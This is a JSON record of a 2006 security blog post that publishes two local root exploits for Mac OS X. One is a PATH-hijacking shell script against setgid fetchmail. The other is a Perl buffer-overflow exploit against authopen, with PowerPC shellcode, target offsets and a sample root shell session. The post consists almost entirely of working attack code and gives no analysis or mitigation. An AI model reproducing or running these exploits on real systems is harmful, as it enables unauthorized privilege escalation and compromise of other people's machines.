{"id":396,"date":"2006-08-05T03:25:03","date_gmt":"2006-08-04T20:25:03","guid":{"rendered":""},"modified":"2006-08-05T03:25:03","modified_gmt":"2006-08-04T20:25:03","slug":"osx-local-fetchmail-exploit","status":"publish","type":"post","link":"https:\/\/deepquest.code511.com\/blog\/2006\/08\/osx-local-fetchmail-exploit\/","title":{"rendered":"OSX: local fetchmail exploit"},"content":{"rendered":"<p>local fetchmail exploit v1 an v2<!--more--><\/p>\n<p>#!\/bin\/sh<br \/>\n#<br \/>\n# Previously undisclosed local fetchmail issue. This takes setgid=6<br \/>\n#<\/p>\n<p>export PATH=\/tmp:$PATH<br \/>\necho \/bin\/sh -i > \/tmp\/uname<br \/>\nchmod +x \/tmp\/uname<br \/>\n\/usr\/bin\/fetchmail -V<\/p>\n<p>v2:<\/p>\n<p>#!\/usr\/bin\/perl<br \/>\n#<br \/>\n# Variant of CF_CHARSET_PATH a local root exploit by v9_at_fakehalo.us<br \/>\n#<br \/>\n# Jill-Does-Computer:\/tmp jilldoe$ .\/authopen-CF_CHARSET.pl 0<br \/>\n# *** Target: 10.3.7 Build 7T65 on PowerPC, Padding: 1<br \/>\n# sh-2.05b# id<br \/>\n# uid=502(jilldoe) euid=0(root) gid=502(jilldoe) groups=502(jilldoe), 79(appserverusr), 80(admin), 81(appserveradm)<br \/>\n#<br \/>\n#<\/p>\n<p>foreach $key (keys %ENV) {<\/p>\n<p>   delete $ENV{$key};<\/p>\n<p>}<\/p>\n<p>#\/\/ ppc execve() code by b-r00t + nemo to add seteuid(0)<br \/>\n$sc =<br \/>\n&#8220;\\x7c\\x63\\x1a\\x79&#8221; .<br \/>\n&#8220;\\x40\\x82\\xff\\xfd&#8221; .<br \/>\n&#8220;\\x39\\x40\\x01\\xc3&#8221; .<br \/>\n&#8220;\\x38\\x0a\\xfe\\xf4&#8221; .<br \/>\n&#8220;\\x44\\xff\\xff\\x02&#8221; .<br \/>\n&#8220;\\x39\\x40\\x01\\x23&#8221; .<br \/>\n&#8220;\\x38\\x0a\\xfe\\xf4&#8221; .<br \/>\n&#8220;\\x44\\xff\\xff\\x02&#8221; .<br \/>\n&#8220;\\x60\\x60\\x60\\x60&#8221; .<br \/>\n&#8220;\\x7c\\xa5\\x2a\\x79&#8221; .<br \/>\n&#8220;\\x40\\x82\\xff\\xfd&#8221; .<br \/>\n&#8220;\\x7d\\x68\\x02\\xa6&#8221; .<br \/>\n&#8220;\\x3b\\xeb\\x01\\x70&#8221; .<br \/>\n&#8220;\\x39\\x40\\x01\\x70\\x39\\x1f\\xfe\\xcf&#8221; .<br \/>\n&#8220;\\x7c\\xa8\\x29\\xae\\x38\\x7f\\xfe\\xc8&#8221; .<br \/>\n&#8220;\\x90\\x61\\xff\\xf8\\x90\\xa1\\xff\\xfc&#8221; .<br \/>\n&#8220;\\x38\\x81\\xff\\xf8\\x38\\x0a\\xfe\\xcb&#8221; .<br \/>\n&#8220;\\x44\\xff\\xff\\x02\\x7c\\xa3\\x2b\\x78&#8221; .<br \/>\n&#8220;\\x38\\x0a\\xfe\\x91\\x44\\xff\\xff\\x02&#8221; .<br \/>\n&#8220;\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x58&#8221;;<\/p>\n<p>$tgts{&#8220;0&#8221;} = &#8220;10.3.7 Build 7T65 on PowerPC:1&#8221;;<br \/>\n$tgts{&#8220;1&#8221;} = &#8220;10.3.7 debug 0x41424344:0&#8221;;<\/p>\n<p>unless (($target) = @ARGV) {<\/p>\n<p>       print &#8220;\\n\\nUsage: $0 <target> \\n\\nTargets:\\n\\n&#8221;;<\/p>\n<p>       foreach $key (sort(keys %tgts)) {<br \/>\n               ($a,$b) = split(\/\\:\/,$tgts{&#8220;$key&#8221;});<br \/>\n               print &#8220;\\t$key . $a\\n&#8221;;<br \/>\n       }<\/p>\n<p>       print &#8220;\\n&#8221;;<br \/>\n       exit 1;<br \/>\n}<\/p>\n<p>$ret = pack(&#8220;l&#8221;, ($retval));<br \/>\n($a,$b) = split(\/\\:\/,$tgts{&#8220;$target&#8221;});<br \/>\nprint &#8220;*** Target: $a, Padding: $b\\n&#8221;;<\/p>\n<p># add a wrapper here if you want more than euid=0<br \/>\nopen(SUSH,&#8221;>\/tmp\/sh&#8221;);<br \/>\nprintf SUSH &#8220;\/bin\/csh -i\\n&#8221;;<\/p>\n<p>$ENV{&#8220;CF_CHARSET_PATH&#8221;} = &#8220;A&#8221; x 1048 . pack(&#8216;l&#8217;, 0xbffffef6) x 2;<\/p>\n<p>$ENV{&#8220;APPL&#8221;} = &#8220;.&#8221; x $b . &#8220;iiii&#8221; x 40 . $sc ;<\/p>\n<p>system(&#8220;\/usr\/libexec\/authopen \/etc\/master.passwd&#8221;);<\/p>\n","protected":false},"excerpt":{"rendered":"<p>OSX: local fetchmail exploit<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"","_seopress_robots_index":"","jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[3],"tags":[],"class_list":["post-396","post","type-post","status-publish","format-standard","hentry","category-security"],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/p4bBYZ-6o","_links":{"self":[{"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/posts\/396","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/comments?post=396"}],"version-history":[{"count":0,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/posts\/396\/revisions"}],"wp:attachment":[{"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/media?parent=396"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/categories?post=396"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/tags?post=396"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}